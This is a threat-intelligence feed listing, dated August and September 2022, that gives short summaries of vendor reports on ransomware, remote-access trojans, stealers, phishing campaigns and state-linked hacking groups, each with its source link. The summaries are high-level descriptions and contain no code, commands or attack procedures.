Date of Scan:
2022-09-06
Impact:
LOW
Summary:
Researchers from Team Cymru have done a detailed examination of the Mythic C2 framework, a free-to-use, open-source tool written in Python that provides cross-platform payload creation options for Linux, macOS, and Windows.
Source: https://team-cymru.com/blog/2022/09/06/mythic-case-study-assessing-common-offensive-security-tools/
2022-09-06
NoName057(16)_Hacker_Group_Targeting_Ukraine_Supporters_with_DDoS_Attack
LOW
+
Intel Source:
Avast
Intel Name:
NoName057(16)_Hacker_Group_Targeting_Ukraine_Supporters_with_DDoS_Attack
Date of Scan:
2022-09-06
Impact:
LOW
Summary:
Researchers from Avast Threat Lab have identified a pro-Russian group named NoName057(16) that is performing DDoS attacks on websites belonging to governments, news agencies, armies, suppliers, telecommunications companies, transportation authorities, financial institutions, and more, both in Ukraine and in neighboring countries that support Ukraine, such as Estonia, Lithuania, Norway, and Poland.
Source: https://decoded.avast.io/martinchlumecky/bobik/?utm_source=rss&utm_medium=rss&utm_campaign=bobik
2022-09-06
DangerousSavanna_Malicious_Campaign_Targeting_Financial_Institutions
LOW
+
Intel Source:
Checkpoint
Intel Name:
DangerousSavanna_Malicious_Campaign_Targeting_Financial_Institutions
Date of Scan:
2022-09-06
Impact:
LOW
Summary:
Researchers from Check Point have analyzed a malicious campaign called DangerousSavanna, which has been targeting multiple major financial service groups in French-speaking Africa for the last two years.
Source: https://research.checkpoint.com/2022/dangeroussavanna-two-year-long-campaign-targets-financial-institutions-in-french-speaking-africa/
2022-09-06
Play_Ransomware_Following_the_Tactics_of_Hive_and_Nokoyawa_Ransomware
LOW
Intel Source:
TrendMicro
Intel Name:
Play_Ransomware_Following_the_Tactics_of_Hive_and_Nokoyawa_Ransomware
Date of Scan:
2022-09-06
Impact:
LOW
Summary:
TrendMicro researchers have investigated Play ransomware and found that it uses many tactics that follow the playbook of both Hive and Nokoyawa ransomware, including similarities in the file names and file paths of their respective tools and payloads.
Source: https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html
2022-09-06
Shikitega_Malware_Targeting_Linux
MEDIUM
Intel Source:
AT&T
Intel Name:
Shikitega_Malware_Targeting_Linux
Date of Scan:
2022-09-06
Impact:
MEDIUM
Summary:
Researchers from AT&T Alien Labs have discovered a new malware named Shikitega targeting endpoints and IoT devices that are running Linux operating systems.
Source: https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux
2022-09-05
HWP_File_Exploit_OLE_Objects_and_Flash_Vulnerabilities
LOW
Intel Source:
ASEC
Intel Name:
HWP_File_Exploit_OLE_Objects_and_Flash_Vulnerabilities
Date of Scan:
2022-09-05
Impact:
LOW
Summary:
Researchers from ASEC have identified a malicious HWP file that exploits OLE objects and Flash vulnerabilities. The identified HWP file includes OLE objects, and the corresponding files are generated in the %TEMP% folder when the HWP file is opened.
Source: https://asec.ahnlab.com/en/38479/
2022-09-05
A_New_CodeRAT_is_Being_Exposed
LOW
Intel Source:
SafeBreach
Intel Name:
A_New_CodeRAT_is_Being_Exposed
Date of Scan:
2022-09-05
Impact:
LOW
Summary:
SafeBreach Labs researchers have discovered a new targeted attack and uncovered a new Remote Access Trojan. It is targeting Farsi-speaking code developers using a Microsoft Dynamic Data Exchange (DDE) exploit.
Source: https://www.safebreach.com/resources/blog/remote-access-trojan-coderat/
2022-09-05
BumbleBee_is_Refactored_Version_of_Bookworm_Backdoor
LOW
Intel Source:
TrendMicro
Intel Name:
BumbleBee_is_Refactored_Version_of_Bookworm_Backdoor
Date of Scan:
2022-09-05
Impact:
LOW
Summary:
Researchers from TrendMicro analyzed a backdoor with a unique modular architecture and named it BumbleBee due to a string embedded in it. The features of BumbleBee and Bookworm are similar, so BumbleBee is likely a refactored version of the latter and targets Asian local governments.
Source: https://www.trendmicro.com/en_us/research/22/i/buzzing-in-the-background-bumblebee-a-new-modular-backdoor-evolv.html
2022-09-05
EvilProxy_PhaaS_with_MFA_Bypass_Rising_in_DarkWeb
LOW
Intel Source:
Resecurity
Intel Name:
EvilProxy_PhaaS_with_MFA_Bypass_Rising_in_DarkWeb
Date of Scan:
2022-09-05
Impact:
LOW
Summary:
Researchers from Resecurity have identified a new Phishing-as-a-Service (PhaaS) called EvilProxy advertised in the Dark Web. The threat actors are using Reverse Proxy and Cookie Injection methods to bypass 2FA authentication.
Source: https://resecurity.com/blog/article/evilproxy-phishing-as-a-service-with-mfa-bypass-emerged-in-dark-web
2022-09-02
The_Evidence_of_Connection_between_Raspberry_Robin_malware_and_Dridex
LOW
Intel Source:
IBM Security Intelligence
Intel Name:
The_Evidence_of_Connection_between_Raspberry_Robin_malware_and_Dridex
Date of Scan:
2022-09-02
Impact:
LOW
Summary:
Researchers from IBM have identified functional similarities between a malicious component used in the Raspberry Robin infection chain and a Dridex malware loader, further strengthening the operators' connections to the Russia-based Evil Corp group.
Source: https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/
2022-09-02
ELF_Based_Ransomware_targating_Linux_system
LOW
Intel Source:
Uptycs
Intel Name:
ELF_Based_Ransomware_targating_Linux_system
Date of Scan:
2022-09-02
Impact:
LOW
Summary:
Researchers from Uptycs have observed an Executable and Linkable Format (ELF) ransomware that encrypts the files inside Linux systems based on a given folder path and drops a README note.
Source: https://www.uptycs.com/blog/another-ransomware-for-linux-likely-in-development
2022-09-02
Snake_Keylogger_Returns_with_New_Malspam_Campaign
LOW
Intel Source:
BitDefender
Intel Name:
Snake_Keylogger_Returns_with_New_Malspam_Campaign
Date of Scan:
2022-09-02
Impact:
LOW
Summary:
According to BitDefender researchers, the IP addresses used in the attack originated from Vietnam, while the campaign's main targets were based in the USA. To lure victims into opening ZIP archives, attackers use the profile of one of Qatar's largest IT and cloud service providers. It contains an executable called CPMPANY PROFILE.exe.
Source: https://www.bitdefender.com/blog/hotforsecurity/snake-keylogger-returns-in-malspam-campaign-disguised-as-business-portfolio-from-it-vendor/
2022-09-02
Ransomware_targating_Microsoft_and_VMware_ESXiservers
LOW
Intel Source:
CSIRT
Intel Name:
Ransomware_targating_Microsoft_and_VMware_ESXiservers
Date of Scan:
2022-09-02
Impact:
LOW
Summary:
CSIRT has reported an incident that affected a government service. The incident corresponds to ransomware that affected Microsoft and VMware ESXi servers in the corporate networks of the institution.
Source: https://www.csirt.gob.cl/noticias/alerta-de-seguridad-cibernetica-incidente-en-servicio-publico/
2022-09-02
A_Detailed_Analysis_of_Redeemer_Ransomware
LOW
Intel Source:
Cloudsek
Intel Name:
A_Detailed_Analysis_of_Redeemer_Ransomware
Date of Scan:
2022-09-02
Impact:
LOW
Summary:
Researchers from CloudSEK have deeply analyzed Redeemer Ransomware. It was initially identified in June 2021, and since then, four public versions (1.0, 1.5, 1.7, and 2.0) have been released.
Source: https://cloudsek.com/what-is-redeemer-ransomware-and-how-does-it-spread-a-technical-analysis/?utm_source=rss&utm_medium=rss&utm_campaign=what-is-redeemer-ransomware-and-how-does-it-spread-a-technical-analysis
2022-09-02
Prynt_Stealer_Malware_Secret_Backdoor_Exposed
LOW
Intel Source:
Zscaler
Intel Name:
Prynt_Stealer_Malware_Secret_Backdoor_Exposed
Date of Scan:
2022-09-02
Impact:
LOW
Summary:
Researchers from Zscaler have uncovered that the Prynt Stealer builder, along with the related WorldWind and DarkEye builders, has a secret backdoor in its code that ends up in every derivative copy and variant of these malware families.
Source: https://www.zscaler.com/blogs/security-research/no-honor-among-thieves-prynt-stealers-backdoor-exposed
2022-09-02
Diving_Deep_into_BianLian_Ransomware
MEDIUM
Intel Source:
Redacted
Intel Name:
Diving_Deep_into_BianLian_Ransomware
Date of Scan:
2022-09-02
Impact:
MEDIUM
Summary:
Researchers from Redacted have observed the BianLian threat actor tripling their known command and control (C2) infrastructure in the month of August, suggesting a possible increase in the actor’s operational tempo.
Source: https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/?utm_source=PR&utm_campaign=BianLian&utm_content=media
2022-09-01
The_AgentTesla_malware_increased_distribution
LOW
Intel Source:
CERT-UA
Intel Name:
The_AgentTesla_malware_increased_distribution
Date of Scan:
2022-09-01
Impact:
LOW
Summary:
CERT-UA has tracked mass mailings of emails with the subject "Technisches Zeichnen". Attached to the e-mail is an IMG file containing a CHM file of the same name; opening it executes JavaScript code.
Source: https://cert.gov.ua/article/1563322
2022-09-01
MagecartJavaScriptSkimmerStealingPaymentInformation
LOW
Intel Source:
Cyble
Intel Name:
MagecartJavaScriptSkimmerStealingPaymentInformation
Date of Scan:
2022-09-01
Impact:
LOW
Summary:
Researchers from Cyble Intelligence Labs have identified that a JavaScript skimmer created by the Magecart threat group has been stealing payment information from a Magento e-commerce website.
Source: https://blog.cyble.com/2022/09/01/highly-evasive-magecart-javascript-skimmer-active-in-the-wild/
2022-09-01
Hackers_Using_ModernLoader_RAT_to_Infect_Systems_with_Stealers_and_Cryptominers
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
Hackers_Using_ModernLoader_RAT_to_Infect_Systems_with_Stealers_and_Cryptominers
Date of Scan:
2022-09-01
Impact:
MEDIUM
Summary:
Researchers at Cisco Talos have observed three distinct campaigns between March and June 2022 that delivered a number of threats, including the ModernLoader bot, the RedLine information stealer, and cryptocurrency mining malware.
Source: https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html
2022-09-01
Hackers_Leveraging_Fast_Reverse_Proxy_tool_to_Attack_Korean_Companies
LOW
Intel Source:
ASEC
Intel Name:
Hackers_Leveraging_Fast_Reverse_Proxy_tool_to_Attack_Korean_Companies
Date of Scan:
2022-09-01
Impact:
LOW
Summary:
ASEC researchers have identified hackers scanning and attacking externally accessible corporate systems such as IIS web servers or MS Exchange servers. Afterward, they use a webshell to gain a foothold on the system and abuse Potato-style or other exploit tools that support privilege escalation, thereby obtaining system privileges.
Source: https://asec.ahnlab.com/en/38156/
2022-09-01
A_new_wild_version_of_ChromeLoader
LOW
Intel Source:
Cyber Geeks
Intel Name:
A_new_wild_version_of_ChromeLoader
Date of Scan:
2022-09-01
Impact:
LOW
Summary:
Cyber Geeks analyzed a new version of ChromeLoader (also known as Choziosi Loader) over the last couple of weeks. It appears that this campaign has become widespread and has spawned multiple versions, making atomic indicators ineffective for detection.
Source: https://cybergeeks.tech/chromeloader-browser-hijacker/
2022-09-01
Malicious_MS_Word_Files_Targeting_North_Korea
LOW
Intel Source:
ASEC
Intel Name:
Malicious_MS_Word_Files_Targeting_North_Korea
Date of Scan:
2022-09-01
Impact:
LOW
Summary:
Researchers from ASEC have discovered the continuous distribution of malicious Word files targeting specific individuals related to national defense and North Korea. Most of the confirmed Word files had filenames that included the names of individuals related to North Korea.
Source: https://asec.ahnlab.com/en/38182/
2022-09-01
The_cash_payments_online_fraud
LOW
Intel Source:
CERT-UA
Intel Name:
The_cash_payments_online_fraud
Date of Scan:
2022-09-01
Impact:
LOW
Summary:
CERT-UA observed an increase in the number of scam pages on the Facebook social network. The content of these pages refers to monetary compensation, the eHelp platform, and financial assistance from various organizations and partners.
Source: https://cert.gov.ua/article/1545776
2022-09-01
VBScript_downloads_a_malicious_HWP_file
LOW
Intel Source:
ASEC
Intel Name:
VBScript_downloads_a_malicious_HWP_file
Date of Scan:
2022-09-01
Impact:
LOW
Summary:
Researchers from the ASEC team have discovered a VBScript that downloads a malicious HWP file. The distribution path of the malware is yet to be determined, but the VBScript itself is downloaded through curl.
Source: https://asec.ahnlab.com/en/38203/
2022-09-01
RAT_Tool_Distributed_on_Github_as_Solution_File
LOW
Intel Source:
ASEC
Intel Name:
RAT_Tool_Distributed_on_Github_as_Solution_File
Date of Scan:
2022-09-01
Impact:
LOW
Summary:
ASEC researchers have discovered a RAT Tool disguised as a solution file (*.sln) on GitHub. To avoid detection, the malware disguised itself as a solution file. Upon execution, it injects into normal Windows programs, such as AppLaunch.exe, RegAsm.exe, and InstallUtil.exe, to run a RAT.
Source: https://asec.ahnlab.com/en/38150/
2022-09-01
Ragnar_Locker_Ransomware_Targeting_Energy_Sector
LOW
Intel Source:
Cybereason
Intel Name:
Ragnar_Locker_Ransomware_Targeting_Energy_Sector
Date of Scan:
2022-09-01
Impact:
LOW
Summary:
Researchers from Cybereason have investigated the Ragnar Locker malware family, a ransomware and ransomware operator that has recently claimed to have breached DESFA, a Greek pipeline company.
Source: https://www.cybereason.com/blog/threat-analysis-report-ragnar-locker-ransomware-targeting-the-energy-sector
2022-09-01
Diving_Deep_into_Industrial_Espionage_Operation
LOW
Intel Source:
BitDefender
Intel Name:
Diving_Deep_into_Industrial_Espionage_Operation
Date of Scan:
2022-09-01
Impact:
LOW
Summary:
BitDefender researchers have analyzed a corporate espionage operation in depth. A common misconception is that espionage affects only large corporations or government entities, but it is more common than expected.
Source: https://businessinsights.bitdefender.com/deep-dive-into-a-corporate-espionage-operation
2022-08-31
The_activation_of_PureCrypter_Loader_continues
MEDIUM
Intel Source:
Netlab 360
Intel Name:
The_activation_of_PureCrypter_Loader_continues
Date of Scan:
2022-08-31
Impact:
MEDIUM
Summary:
Researchers from Netlab have identified that the PureCrypter loader has continued to be active this year, spreading over 10 other families including Formbook, SnakeKeylogger, AgentTesla, Redline, AsyncRAT, and more.
Source: https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/
2022-08-30
AsyncRAT_Leveraging_Fully_Undetected_Downloader
LOW
Intel Source:
Netskope
Intel Name:
AsyncRAT_Leveraging_Fully_Undetected_Downloader
Date of Scan:
2022-08-30
Impact:
LOW
Summary:
Researchers from Netskope have analyzed the complete infection flow of AsyncRAT, from the FUD BAT downloader spotted by MalwareHunterTeam to the final payload. Although no AV vendor is detecting the file, it triggers many detections via Sigma and IDS rules, as well as in the sandboxes used by VirusTotal.
Source: https://www.netskope.com/blog/asyncrat-using-fully-undetected-downloader
2022-08-30
New_Golang_Attack_Campaign_GO#WEBBFUSCATOR_Leverages_Office_Macros
MEDIUM
Intel Source:
Securonix
Intel Name:
New_Golang_Attack_Campaign_GO#WEBBFUSCATOR_Leverages_Office_Macros
Date of Scan:
2022-08-30
Impact:
MEDIUM
Summary:
The Securonix Threat Labs Threat Research Team has recently analyzed a unique sample from a persistent Golang-based attack campaign, tracked by Securonix as GO#WEBBFUSCATOR, that infects the target system with malware.
Source: https://www.securonix.com/blog/golang-attack-campaign-gowebbfuscator-leverages-office-macros-and-james-webb-images-to-infect-systems/
2022-08-30
TA423_threat_group_targeting_countries_in_South_China_Sea
MEDIUM
Intel Source:
ProofPoint
Intel Name:
TA423_threat_group_targeting_countries_in_South_China_Sea
Date of Scan:
2022-08-30
Impact:
MEDIUM
Summary:
Researchers from the Proofpoint and PwC threat intelligence teams have identified a phishing campaign, running for over a year and currently ongoing, targeting countries in the South China Sea, as well as further intrusions in Australia, Europe, and the United States.
Source: https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea
2022-08-30
Crypto_miners_updated_with_latest_techniques
LOW
Intel Source:
AT&T
Intel Name:
Crypto_miners_updated_with_latest_techniques
Date of Scan:
2022-08-30
Impact:
LOW
Summary:
Researchers from AT&T Alien Labs have provided an overview of an ongoing crypto mining campaign that caught their eye due to the large number of loaders that showed up during the month of June, as well as how staged the execution is for a simple piece of malware like a miner.
Source: https://cybersecurity.att.com/blogs/labs-research/crypto-miners-latest-techniques
2022-08-30
Mini_Stealer_Builder_and_Panel_For_Free
LOW
Intel Source:
Cyble
Intel Name:
Mini_Stealer_Builder_and_Panel_For_Free
Date of Scan:
2022-08-30
Impact:
LOW
Summary:
Cyble Research and Intelligence Labs have discovered a post on a cybercrime forum where a Threat Actor released MiniStealer’s builder and panel for free, and they claim that the stealer can target operating systems such as Windows 7, 10, and 11.
Source: https://blog.cyble.com/2022/08/29/mini-stealer-possible-predecessor-of-parrot-stealer/
2022-08-29
Remcos_RAT_updated_with_New_TTPs
LOW
Intel Source:
SocInvestigations
Intel Name:
Remcos_RAT_updated_with_New_TTPs
Date of Scan:
2022-08-29
Impact:
LOW
Summary:
Researchers from SOCInvestigation have identified new TTPs of Remcos RAT. It is a dangerous trojan available to attackers for a relatively low price, and it comes equipped with enough robust features to allow attackers to set up their own effective botnets.
Source: https://www.socinvestigation.com/remcos-rat-new-ttps-detection-response/
2022-08-29
TeamTNT_Group_Targeting_Cloud_Instances_and_Containerized_Environments
LOW
Intel Source:
Cloudsek
Intel Name:
TeamTNT_Group_Targeting_Cloud_Instances_and_Containerized_Environments
Date of Scan:
2022-08-29
Impact:
LOW
Summary:
CloudSEK researchers have identified that the known threat actor TeamTNT has been targeting cloud instances and containerized environments on systems around the world for at least two years.
Source: https://cloudsek.com/threatintelligence/timeline-ttps-of-teamtnt-cybercrime-group/
2022-08-29
Spear-phishing_and_AiTM_Used_to_Hack_MS_Office_365_Accounts
LOW
Intel Source:
Mitiga
Intel Name:
Spear-phishing_and_AiTM_Used_to_Hack_MS_Office_365_Accounts
Date of Scan:
2022-08-29
Impact:
LOW
Summary:
The Mitiga Research Team has identified a sophisticated, advanced business email compromise (BEC) campaign directly targeting relevant executives of organizations using Office 365.
Source: https://www.mitiga.io/blog/advanced-bec-scam-campaign-targeting-executives-on-o365
2022-08-29
A_Crypto_Miner_Malware_Campaign_Named_Nitrokod
LOW
Intel Source:
Checkpoint
Intel Name:
A_Crypto_Miner_Malware_Campaign_Named_Nitrokod
Date of Scan:
2022-08-29
Impact:
LOW
Summary:
Researchers from Checkpoint have detected a cryptomining campaign, called Nitrokod, which potentially infected thousands of machines worldwide. It was created by a Turkish-speaking entity, and the campaign dropped malware via free software available on popular websites such as Softpedia and Uptodown.
Source: https://research.checkpoint.com/2022/check-point-research-detects-crypto-miner-malware-disguised-as-google-translate-desktop-and-other-legitimate-applications/
2022-08-29
First_Known_Phishing_Attack_Against_PyPI_Users
LOW
Intel Source:
CheckMarx
Intel Name:
First_Known_Phishing_Attack_Against_PyPI_Users
Date of Scan:
2022-08-29
Impact:
LOW
Summary:
Researchers from CheckMarx have identified an ongoing phishing campaign that aims to steal developer credentials and inject malicious updates into packages in the repository; it is the first known phishing attack against the Python Package Index (PyPI).
Source: https://medium.com/checkmarx-security/first-known-phishing-attack-against-pypi-contributor-95db34548868
2022-08-29
The_emerging_of_BlueSky_ransomware
LOW
Intel Source:
SentinelOne
Intel Name:
The_emerging_of_BlueSky_ransomware
Date of Scan:
2022-08-29
Impact:
LOW
Summary:
The researchers paid close attention to BlueSky again in late June 2022. SentinelOne observed this ransomware being spread via trojanized downloads from questionable websites as well as through phishing emails.
Source: https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/
2022-08-26
A_deployment_of_32-bits_or_64-bits_malware
LOW
Intel Source:
ISC.SANS
Intel Name:
A_deployment_of_32-bits_or_64-bits_malware
Date of Scan:
2022-08-26
Impact:
LOW
Summary:
The researcher ran an experiment by downloading samples from MalwareBazaar and reported some interesting statistics based on YARA rules.
Source: https://isc.sans.edu/diary/32+or+64+bits+Malware%3F/28968
2022-08-26
New_Agenda_Ransomware_Customized_for_Each_Victim
LOW
Intel Source:
TrendMicro
Intel Name:
New_Agenda_Ransomware_Customized_for_Each_Victim
Date of Scan:
2022-08-26
Impact:
LOW
Summary:
Researchers from TrendMicro have discovered a new ransomware that is written in the Go programming language and targeting healthcare and education enterprises in Asia and Africa. This ransomware is called Agenda and is customized per victim.
Source: https://www.trendmicro.com/en_us/research/22/h/new-golang-ransomware-agenda-customizes-attacks.html
2022-08-26
Iran_Based_Threat_Actor_MERCURY_Leveraging_Exploitation_of_Log4j_2_Vulnerabilities
MEDIUM
Intel Source:
Microsoft
Intel Name:
Iran_Based_Threat_Actor_MERCURY_Leveraging_Exploitation_of_Log4j_2_Vulnerabilities
Date of Scan:
2022-08-26
Impact:
MEDIUM
Summary:
Microsoft Threat Intelligence and 365 Defender Research team have detected Iran-based threat actor MERCURY leveraging exploitation of Log4j 2 vulnerabilities in SysAid applications against organizations all located in Israel.
Source: https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/
2022-08-26
A_Dot_Net_Based_Moisha_Ransomware
LOW
Intel Source:
Cyble
Intel Name:
A_Dot_Net_Based_Moisha_Ransomware
Date of Scan:
2022-08-26
Impact:
LOW
Summary:
Researchers from Cyble have come across a Twitter post about a new ransomware variant named Moisha. A .NET-based ransomware, Moisha was first identified in mid-August 2022, and the threat actor behind it goes by the name PT_MOISHA team.
Source: https://blog.cyble.com/2022/08/25/moisha-ransomware-in-action/
2022-08-26
BleachGap_ransomware_reappeared
LOW
Intel Source:
Labs K7 Security
Intel Name:
BleachGap_ransomware_reappeared
Date of Scan:
2022-08-26
Impact:
LOW
Summary:
Researchers from Labs K7 Security have analyzed the BleachGap ransomware and found that threat actors are modifying the attack techniques of this malware for a possible major attack that might be planned in the future.
Source: https://labs.k7computing.com/index.php/bleachgap-revamped/
2022-08-26
A_Deep_Analysis_of_Karakurt_Ransomware
LOW
Intel Source:
HC3
Intel Name:
A_Deep_Analysis_of_Karakurt_Ransomware
Date of Scan:
2022-08-26
Impact:
LOW
Summary:
Researchers from HC3 have analyzed the Karakurt threat profile in depth and identified four attacks affecting the US Healthcare and Public Health sector since June 2022. The observed attacks have affected an assisted living facility, a dental firm, a healthcare provider, and a hospital.
Source: https://www.hhs.gov/sites/default/files/karakurt-threat-profile-analyst-note.pdf
2022-08-25
Kimsukys_hackers_using_C2_operations_with_GoldDragon_malware
LOW
Intel Source:
Securelist
Intel Name:
Kimsukys_hackers_using_C2_operations_with_GoldDragon_malware
Date of Scan:
2022-08-25
Impact:
LOW
Summary:
Researchers from Securelist have identified that the Kimsuky threat group continuously evolves its malware infection schemes and adopts novel techniques to hinder analysis. It is one of the most prolific and active threat actors on the Korean Peninsula and operates several clusters, of which the GoldDragon malware cluster is one of the most frequently used.
Source: https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/
2022-08-25
Ransomware_Actors_Leveraging_Genshin_Impact_Driver
MEDIUM
Intel Source:
TrendMicro
Intel Name:
Ransomware_Actors_Leveraging_Genshin_Impact_Driver
Date of Scan:
2022-08-25
Impact:
MEDIUM
Summary:
TrendMicro researchers investigated mhyprot2.sys, a vulnerable anti-cheat driver for the popular role-playing game Genshin Impact. The driver is currently being abused by a ransomware actor to kill antivirus processes and services for mass-deploying ransomware.
Source: https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html
2022-08-25
Threat_Actors_Leveraging_Compromised_Microsoft_Dynamics_365_Voice_Account_for_Phishing_Attack
LOW
Intel Source:
Cofense
Intel Name:
Threat_Actors_Leveraging_Compromised_Microsoft_Dynamics_365_Voice_Account_for_Phishing_Attack
Date of Scan:
2022-08-25
Impact:
LOW
Summary:
Researchers from Cofense have identified a widespread campaign where threat actors use a compromised Dynamics 365 Customer Voice business account and a link posing as a survey to steal Microsoft 365 credentials.
Source: https://cofense.com/blog/compromised-microsoft-dynamic-365-customer-voice-account-used-for-phishing-attack
2022-08-25
A_0ktapus_Phishing_Campaign
LOW
Intel Source:
Group-IB
Intel Name:
A_0ktapus_Phishing_Campaign
Date of Scan:
2022-08-25
Impact:
LOW
Summary:
Researchers from the Group-IB Threat Intelligence Team have detected 169 unique domains involved in the 0ktapus phishing campaign. While analyzing the phishing sites, they found that an image legitimately used by sites leveraging Okta authentication was being reused by the phishing kit.
Source: https://blog.group-ib.com/0ktapus
2022-08-25
Diving_Deep_into_Qbot_Malware
LOW
Intel Source:
Trellix
Intel Name:
Diving_Deep_into_Qbot_Malware
Date of Scan:
2022-08-25
Impact:
LOW
Summary:
Researchers from the Trellix SecOps team have observed an uptick in Qbot malware infections in recent months. It has been an active threat for over 14 years and continues to evolve, adopting new infection vectors to evade detection mechanisms.
Source: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/demystifying-qbot-malware.html
2022-08-25
The_Deep_examination_of_Wiper_Malware
LOW
Intel Source:
Crowdstrike
Intel Name:
The_Deep_examination_of_Wiper_Malware
Date of Scan:
2022-08-25
Impact:
LOW
Summary:
Researchers from CrowdStrike's Research Team have identified how threat actors use legitimate third-party drivers to bypass the visibility and detection capabilities of security mechanisms and solutions.
Source: https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-2/
2022-08-25
Multiple_Known_Malware_Findings_from_the_BlackHat_NOC
LOW
Intel Source:
IronNet
Intel Name:
Multiple_Known_Malware_Findings_from_the_BlackHat_NOC
Date of Scan:
2022-08-25
Impact:
LOW
Summary:
IronNet Hunters uncovered several active malware infections on the Black Hat network, including Shlayer malware, North Korean-attributed SHARPEXT malware, and NetSupport RAT malware.
Source: https://www.ironnet.com/blog/a-view-from-the-black-hat-noc-key-findings
2022-08-25
AgentTesla_is_Back_With_a_New_Campaign
LOW
Intel Source:
Avast
Intel Name:
AgentTesla_is_Back_With_a_New_Campaign
Date of Scan:
2022-08-25
Impact:
LOW
Summary:
Threat researchers from Avast have identified a new malicious campaign that is threatening businesses around the world. The campaign is targeting users in Spain, Portugal, Romania, and multiple countries in South America.
Source: https://decoded.avast.io/pavelnovak/agenttesla-is-threatening-businesses-around-the-world-with-a-new-campaign/?utm_source=rss&utm_medium=rss&utm_campaign=agenttesla-is-threatening-businesses-around-the-world-with-a-new-campaign
2022-08-24
Pirated_Software_Download_Sites_Delivering_InfoStealer_Malware
LOW
Intel Source:
Zscaler
Intel Name:
Pirated_Software_Download_Sites_Delivering_InfoStealer_Malware
Date of Scan:
2022-08-24
Impact:
LOW
Summary:
Researchers from Zscaler Threat Labs have discovered multiple ongoing threat campaigns distributing info-stealer malware by targeting victims trying to download pirated software applications.
Source: https://www.zscaler.com/blogs/security-research/making-victims-pay-infostealer-malwares-mimick-pirated-software-download
2022-08-24
The_active_exploitation_of_multiple_vulnerabilities_and_Exposures_against_Zimbra_Collaboration_Suite
LOW
Intel Source:
CISA
Intel Name:
The_active_exploitation_of_multiple_vulnerabilities_and_Exposures_against_Zimbra_Collaboration_Suite
Date of Scan:
2022-08-24
Impact:
LOW
Summary:
CISA and MS-ISAC researchers have identified cyber threat actors targeting unpatched Zimbra Collaboration Suite instances in both government and private sector networks.
Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-228a
2022-08-24
BitRAT_and_XMRig_CoinMiner_Leveraging_Windows_License_Verification_Tool
LOW
Intel Source:
ASEC
Intel Name:
BitRAT_and_XMRig_CoinMiner_Leveraging_Windows_License_Verification_Tool
Date of Scan:
2022-08-24
Impact:
LOW
Summary:
Researchers from ASEC have discovered the distribution of BitRAT and XMRig CoinMiner disguised as a Windows license verification tool.
Source: https://asec.ahnlab.com/en/37939/
2022-08-24
AsyncRAT_Being_Distributed_in_Fileless_Form
LOW
Intel Source:
ASEC
Intel Name:
AsyncRAT_Being_Distributed_in_Fileless_Form
Date of Scan:
2022-08-24
Impact:
LOW
Summary:
Researchers from ASEC have discovered malicious AsyncRAT code that is being distributed in fileless form. It is executed filelessly through multiple script files and is thought to be distributed as a compressed file attachment in emails.
Source: https://asec.ahnlab.com/en/37954/
2022-08-23
MalspamusedbyattackerstodeliverAgentTeslaRAT
LOW
Intel Source:
MalwareBytes
Intel Name:
MalspamusedbyattackerstodeliverAgentTeslaRAT
Date of Scan:
2022-08-23
Impact:
LOW
Summary:
Malwarebytes Threat Intelligence researchers have identified spam emails containing images and CHM files. Upon clicking, the CHM file calls PowerShell commands and starts executing AgentTesla through RegAsm.exe.
Source: https://twitter.com/MBThreatIntel/status/1561736526819639298
2022-08-23
XCSSET_Malware_updated_with_latest_version
LOW
Intel Source:
SentinelOne
Intel Name:
XCSSET_Malware_updated_with_latest_version
Date of Scan:
2022-08-23
Impact:
LOW
Summary:
Researchers from SentinelOne have reviewed the changes made to the latest versions of the XCSSET malware and revealed some of the contexts in which these threat actors operate.
Source: https://www.sentinelone.com/blog/xcsset-malware-update-macos-threat-actors-prepare-for-life-without-python/
2022-08-23
Trends_in_Ukrainian_Domain_attacks
LOW
Intel Source:
Wordfence
Intel Name:
Trends_in_Ukrainian_Domain_attacks
Date of Scan:
2022-08-23
Impact:
LOW
Summary:
Researchers from Wordfence have identified 16 attack types that triggered more than 85 different firewall rules across protected websites with Ukrainian top-level domains.
Source: https://www.wordfence.com/blog/2022/08/analyzing-attack-data-and-trends-targeting-ukrainian-domains/
2022-08-23
IBAN_clipper_malware_targeting_Windows_operating_systems
LOW
Intel Source:
Cyble
Intel Name:
IBAN_clipper_malware_targeting_Windows_operating_systems
Date of Scan:
2022-08-23
Impact:
LOW
Summary:
Researchers from Cyble Labs have highlighted an International Bank Account Number (IBAN) Clipper Malware after identifying a Threat Actor on a cybercrime forum offering monthly subscription-based services of clipper malware targeting Windows operating systems.
Source: https://blog.cyble.com/2022/08/22/dissecting-iban-clipper/
2022-08-23
Iranian_hackers_Leveraging_New_Tool_to_Steal_Email_From_Victims
LOW
Intel Source:
Google blog
Intel Name:
Iranian_hackers_Leveraging_New_Tool_to_Steal_Email_From_Victims
Date of Scan:
2022-08-23
Impact:
LOW
Summary:
Researchers from Google's Threat Analysis Group have observed a new Iranian APT data extraction tool called HYPERSCRAPE. It is written in .NET for Windows PCs and is designed to run on the attacker's machine.
Source: https://blog.google/threat-analysis-group/new-iranian-apt-data-extraction-tool/
2022-08-23
A_Detailed_Analysis_of_PivNoxy_and_Chinoxy_malware
MEDIUM
Intel Source:
Fortinet
Intel Name:
A_Detailed_Analysis_of_PivNoxy_and_Chinoxy_malware
Date of Scan:
2022-08-23
Impact:
MEDIUM
Summary:
